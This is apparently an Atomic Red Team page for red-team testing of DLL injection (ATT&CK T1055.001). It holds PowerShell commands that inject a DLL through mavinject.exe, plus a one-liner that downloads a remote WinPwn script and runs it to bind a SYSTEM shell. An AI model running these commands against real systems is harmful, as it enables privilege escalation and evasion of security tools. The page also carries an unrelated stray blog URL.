Try it using Invoke-Atomic

Process Injection: Dynamic-link Library Injection

Description from ATT&CK

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Process Injection via mavinject.exe

Windows 10 Utility To Inject DLLS.

Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.

Supported Platforms: windows

auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254

Inputs:

Name Description Type Default Value
process_id PID of input_arguments Integer (Start-Process notepad -PassThru).id
dll_payload DLL to Inject Path PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}
Stop-Process -processname notepad

Dependencies: Run with powershell!

Description: Utility to inject must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

1
2
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"

Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique

Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5

Inputs:

None

Attack Commands: Run with powershell!

1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')

source